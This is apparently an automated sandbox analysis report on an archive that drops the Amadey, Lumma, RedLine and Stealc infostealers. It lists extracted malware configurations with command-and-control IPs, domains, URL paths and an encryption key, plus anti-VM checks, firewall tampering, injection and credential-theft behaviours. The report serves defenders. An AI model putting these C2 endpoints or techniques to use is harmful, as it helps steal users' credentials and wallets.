amadey | d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4

Resubmissions

13/07/2024, 00:45

240713-a4kywayaqj 10

12/07/2024, 23:32

240712-3jb5fsvhmn 10

Analysis

max time kernel
1240s
max time network
1495s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
13/07/2024, 00:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

archive.zip
Size

14.0MB
MD5

aa3be7accc9a612ce95fcede2a64d791
SHA1

76bab53214bef8715658e47a01e14b9efc91cea9
SHA256

d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4
SHA512

dc232e6a0588161bd4b5decd3311a3ad1b5e58f723fa8ae7065ee3fa538fd432f4ef8bb857a3be372da97e62c49584041b94a4219ef8eae954491e963f09ecb4
SSDEEP

393216:WxovLlzWh46e8jm2KaxKhHK2VKaiKdWKn9KK:aov5246e8jjKaxKhHK2VKaiKdWKn9KK

Score

10^/10

amadey lumma redline stealc 4dd39d hate logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

stealc

Botnet

hate

http://85.28.47.30

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

lumma

https://answerrsdo.shop/api

https://bannngwko.shop/api

https://bargainnykwo.shop/api

https://affecthorsedpo.shop/api

https://radiationnopp.shop/api

https://publicitttyps.shop/api

https://benchillppwo.shop/api

https://reinforcedirectorywd.shop/api

https://contemplateodszsv.shop/api

https://applyzxcksdia.shop/api

https://replacedoxcjzp.shop/api

https://declaredczxi.shop/api

https://catchddkxozvp.shop/api

https://arriveoxpzxo.shop/api

https://bindceasdiwozx.shop/api

https://conformfucdioz.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Setup.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2692-230-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KJKKJKEHDB.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JDHIEBFHCA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
415	6116	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1040	powershell.exe
5108	powershell.exe
3176	powershell.EXE
1680	powershell.EXE
2740	powershell.exe
5416	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 49 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KJKKJKEHDB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JDHIEBFHCA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KJKKJKEHDB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JDHIEBFHCA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	JDHIEBFHCA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	QlBnrqw.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	xSZzGJO.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	qeHytovv8jeMkSTeroPzDfGu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	KJKKJKEHDB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	explorti.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	116eae0798.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	8f3c6cbb8c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	Install.exe

Executes dropped EXE 52 IoCs

pid	Process
4440	nPAPquOt6RNvYOK4CQLeUD7_.exe
2748	NhcUArWVz9h91TfdrLuqi3dN.exe
664	5cTehe6gNdKe1Sv9i06NPlhi.exe
2468	wViHNmY1iKyifosq0zeVytNC.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2204	DSxvm0Qozb19cuFXWz0Me_M2.exe
2200	5uGv7oVshZ8yAWH01j33e301.exe
552	wxNBuIU21ycpmjWnNfmKrUQ6.exe
4376	so48OhzPv9BhRSeWdcEKIXOJ.exe
4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe
3616	9_9Ow6z5UDUvojxA7gJiny39.exe
2980	wViHNmY1iKyifosq0zeVytNC.tmp
720	Install.exe
4248	Install.exe
1060	Install.exe
4088	Install.exe
4600	goldenmusicalvariety32_64.exe
4816	goldenmusicalvariety32_64.exe
2548	JDHIEBFHCA.exe
2320	KJKKJKEHDB.exe
3404	explorti.exe
3048	explorti.exe
2160	explorti.exe
1716	4750f66173.exe
3140	116eae0798.exe
3104	eqtpkqwqodik.exe
2872	BKJJEBKKEH.exe
2420	CBAKJEHDBG.exe
3824	Install.exe
5084	explorti.exe
5672	Install.exe
372	QlBnrqw.exe
5172	xSZzGJO.exe
4132	explorti.exe
5168	explorti.exe
3444	explorti.exe
5952	explorti.exe
5916	explorti.exe
5476	explorti.exe
6128	explorti.exe
3048	explorti.exe
1044	explorti.exe
3588	explorti.exe
3108	explorti.exe
5676	explorti.exe
3468	explorti.exe
1220	explorti.exe
5260	explorti.exe
4340	explorti.exe
3344	explorti.exe
4976	03613e22b6.exe
808	8f3c6cbb8c.exe

Identifies Wine through registry keys 2 TTPs 23 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	JDHIEBFHCA.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	KJKKJKEHDB.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Wine	explorti.exe

Loads dropped DLL 8 IoCs

pid	Process
2980	wViHNmY1iKyifosq0zeVytNC.tmp
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
808	MSBuild.exe
808	MSBuild.exe
2904	MSBuild.exe
2904	MSBuild.exe
6116	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	QlBnrqw.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	QlBnrqw.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	xSZzGJO.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	QlBnrqw.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
111	iplogger.org
110	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ipinfo.io
38	ipinfo.io
35	api.myip.com
36	api.myip.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1548	powercfg.exe
4260	powercfg.exe
4564	powercfg.exe
464	powercfg.exe
732	powercfg.exe
100	powercfg.exe
3780	powercfg.exe
1088	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00080000000234ee-742.dat	autoit_exe

Drops file in System32 directory 39 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE	QlBnrqw.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	QlBnrqw.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE	QlBnrqw.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	QlBnrqw.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057	QlBnrqw.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	xSZzGJO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437	QlBnrqw.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	QlBnrqw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	QlBnrqw.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 32 IoCs

pid	Process
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2548	JDHIEBFHCA.exe
2320	KJKKJKEHDB.exe
3404	explorti.exe
3048	explorti.exe
2160	explorti.exe
1716	4750f66173.exe
1716	4750f66173.exe
5084	explorti.exe
4132	explorti.exe
5168	explorti.exe
3444	explorti.exe
5952	explorti.exe
5916	explorti.exe
5476	explorti.exe
6128	explorti.exe
3048	explorti.exe
1044	explorti.exe
3588	explorti.exe
3108	explorti.exe
5676	explorti.exe
3468	explorti.exe
1220	explorti.exe
5260	explorti.exe
4340	explorti.exe
3344	explorti.exe
4976	03613e22b6.exe
4976	03613e22b6.exe
4976	03613e22b6.exe
4976	03613e22b6.exe
4976	03613e22b6.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4440 set thread context of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4176 set thread context of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 552 set thread context of 2904	552	wxNBuIU21ycpmjWnNfmKrUQ6.exe	124
PID 2748 set thread context of 808	2748	NhcUArWVz9h91TfdrLuqi3dN.exe	125
PID 3616 set thread context of 732	3616	9_9Ow6z5UDUvojxA7gJiny39.exe	158
PID 3104 set thread context of 1828	3104	eqtpkqwqodik.exe	178
PID 3104 set thread context of 4600	3104	eqtpkqwqodik.exe	183
PID 2872 set thread context of 4256	2872	BKJJEBKKEH.exe	185
PID 2420 set thread context of 3932	2420	CBAKJEHDBG.exe	191

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	xSZzGJO.exe
File created	C:\Program Files (x86)\tuyZfYaPCcjxC\IDiVWww.dll	xSZzGJO.exe
File created	C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\RGSgcsB.xml	QlBnrqw.exe
File created	C:\Program Files (x86)\qioMUrUoKCErC\yJBQVUm.xml	QlBnrqw.exe
File created	C:\Program Files (x86)\nXmjFVOHU\WTjYNb.dll	xSZzGJO.exe
File created	C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\WHjuCXH.xml	xSZzGJO.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	QlBnrqw.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	xSZzGJO.exe
File created	C:\Program Files (x86)\nXmjFVOHU\LqlsQwK.xml	xSZzGJO.exe
File created	C:\Program Files (x86)\RmqlacUQU\QeBEPr.dll	QlBnrqw.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	QlBnrqw.exe
File created	C:\Program Files (x86)\qioMUrUoKCErC\xfvKvBP.dll	QlBnrqw.exe
File created	C:\Program Files (x86)\ANKVsfPAuVEU2\MWuTYjFYxNEbQ.dll	xSZzGJO.exe
File created	C:\Program Files (x86)\ANKVsfPAuVEU2\iQvjvvn.xml	xSZzGJO.exe
File created	C:\Program Files (x86)\utOkvPMviNUn\FGyYbiS.dll	xSZzGJO.exe
File created	C:\Program Files (x86)\RmqlacUQU\yiKNMkl.xml	QlBnrqw.exe
File created	C:\Program Files (x86)\XYcGyWaqnbhU2\BQNekBWEqPIrm.dll	QlBnrqw.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	xSZzGJO.exe
File created	C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\xYwURuS.dll	xSZzGJO.exe
File created	C:\Program Files (x86)\IFfyxFxqzCUn\jBJOQfr.dll	QlBnrqw.exe
